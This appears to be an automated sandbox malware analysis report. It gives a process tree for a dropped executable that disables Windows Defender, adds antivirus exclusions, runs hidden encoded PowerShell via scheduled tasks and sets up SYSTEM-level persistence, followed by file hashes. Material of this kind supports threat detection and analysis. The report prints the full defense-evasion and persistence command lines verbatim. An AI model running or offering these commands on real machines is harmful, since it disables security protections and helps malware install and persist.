C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2020
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:556
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1740
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2000
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjIUHdiYq" /SC once /ST 09:43:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjIUHdiYq"4⤵PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjIUHdiYq"4⤵PID:844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWPHdmAVYBQYtPDpwk" /SC once /ST 18:17:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo\mlYPdewCyeUuPzk\PmsRSUF.exe\" Jc /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1536
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {32A1D879-FC09-43AF-819E-68961348A0AF} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:1984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1336
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1164
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1596
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1632
-
C:\Windows\system32\taskeng.exetaskeng.exe {7AD4CE02-66B7-4FB7-977E-7D9884ECFE9D} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1660
-
C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo\mlYPdewCyeUuPzk\PmsRSUF.exeC:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo\mlYPdewCyeUuPzk\PmsRSUF.exe Jc /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1944 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMulGxjUy" /SC once /ST 01:15:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMulGxjUy"3⤵PID:1764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMulGxjUy"3⤵PID:1700
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1956
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1496
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:468
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "griubvspD" /SC once /ST 04:47:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "griubvspD"3⤵PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "griubvspD"3⤵PID:1604
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:323⤵PID:1484
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:643⤵PID:1612
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:323⤵PID:1040
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:324⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:643⤵PID:1480
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:644⤵PID:468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\TPVzhEqTdbaLncel\QsFRfzqr\CLwmOxygtKJyKxDB.wsf"3⤵PID:304
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\TPVzhEqTdbaLncel\QsFRfzqr\CLwmOxygtKJyKxDB.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1748 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DfJvMZcohastC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DfJvMZcohastC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAIUtCbZzZUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAIUtCbZzZUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QfvXVdpwU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QfvXVdpwU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFMikQRJUGqU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFMikQRJUGqU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XbMKmfBwBDDwRKVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XbMKmfBwBDDwRKVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DfJvMZcohastC" /t REG_DWORD /d 0 /reg:324⤵PID:1448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DfJvMZcohastC" /t REG_DWORD /d 0 /reg:644⤵PID:720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAIUtCbZzZUn" /t REG_DWORD /d 0 /reg:324⤵PID:1200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAIUtCbZzZUn" /t REG_DWORD /d 0 /reg:644⤵PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR" /t REG_DWORD /d 0 /reg:324⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR" /t REG_DWORD /d 0 /reg:644⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QfvXVdpwU" /t REG_DWORD /d 0 /reg:324⤵PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QfvXVdpwU" /t REG_DWORD /d 0 /reg:644⤵PID:1368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFMikQRJUGqU2" /t REG_DWORD /d 0 /reg:324⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFMikQRJUGqU2" /t REG_DWORD /d 0 /reg:644⤵PID:688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XbMKmfBwBDDwRKVB" /t REG_DWORD /d 0 /reg:324⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XbMKmfBwBDDwRKVB" /t REG_DWORD /d 0 /reg:644⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo" /t REG_DWORD /d 0 /reg:324⤵PID:1392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo" /t REG_DWORD /d 0 /reg:644⤵PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:324⤵PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TPVzhEqTdbaLncel" /t REG_DWORD /d 0 /reg:644⤵PID:1068
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giLfrZlMd" /SC once /ST 15:14:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giLfrZlMd"3⤵PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giLfrZlMd"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:944
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1220
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1884
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JkhvNaHMbfLntcTvc" /SC once /ST 07:30:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TPVzhEqTdbaLncel\kXTFwqeFMyPmpTo\bUrsYKP.exe\" JH /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JkhvNaHMbfLntcTvc"3⤵PID:1128
-
-
-
C:\Windows\Temp\TPVzhEqTdbaLncel\kXTFwqeFMyPmpTo\bUrsYKP.exeC:\Windows\Temp\TPVzhEqTdbaLncel\kXTFwqeFMyPmpTo\bUrsYKP.exe JH /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:556 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWPHdmAVYBQYtPDpwk"3⤵PID:364
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:808
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1448
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1488
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QfvXVdpwU\xmZzyr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "EYzwTnvEQRecZIn" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EYzwTnvEQRecZIn2" /F /xml "C:\Program Files (x86)\QfvXVdpwU\xygbfOX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "EYzwTnvEQRecZIn"3⤵PID:1808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EYzwTnvEQRecZIn"3⤵PID:1644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DOrqqYfKfExorH" /F /xml "C:\Program Files (x86)\fFMikQRJUGqU2\ostmdPe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FizPlBiWkaAyW2" /F /xml "C:\ProgramData\XbMKmfBwBDDwRKVB\VBZBdrX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GfsDqfVMrCRYsKgOj2" /F /xml "C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR\lsvPlzh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xWnVlymuGNOfFNATUjQ2" /F /xml "C:\Program Files (x86)\DfJvMZcohastC\CFUKLYG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lvaVsmZHGpIVGhWCV" /SC once /ST 08:27:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TPVzhEqTdbaLncel\HCLlAAZM\gSGtEYB.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lvaVsmZHGpIVGhWCV"3⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1784
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1448
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1124
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JkhvNaHMbfLntcTvc"3⤵PID:288
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TPVzhEqTdbaLncel\HCLlAAZM\gSGtEYB.dll",#1 /site_id 5254032⤵PID:1480
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TPVzhEqTdbaLncel\HCLlAAZM\gSGtEYB.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1836 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lvaVsmZHGpIVGhWCV"4⤵PID:1644
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1860
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:840
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1616
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD505ee26c8ed2f6a11ebceb9c08aa051f0
SHA19fd5c3dd0b6d9c5a12cfa8968ca9cb3eeb32b4a1
SHA256ede9a48fa7ee84baff50d5565ffa80828751835342575c8f1badba0ee05d571f
SHA5125f6b2c296a0e1d381b971edbc2cf366ee0cdb93ab473324be3fa74806ebfc7bcb13a99164f384f31ca9c27c2b42cddb2bc1312b918c710f1e4e8e8c40282efa3
-
Filesize
2KB
MD56c2f6c05ea9b4a48d6e8deadda427efc
SHA1d552a511f53f5b90e5ba5096fa38170d6775cccf
SHA2565d5e3b89c998735be84f60c6efbd9bb852e67955a83e637d07516c43f8812799
SHA512a7b31d311a4ddfebc23fc74aa1809ef214b7e01c124791d872710c340df3922f8d7cf4803bc92f3501ef3e926cef3ddc4daae61780b6ac09ad0506e1096cfde6
-
Filesize
2KB
MD5fdda2fc381705ee86b0194730228f4fc
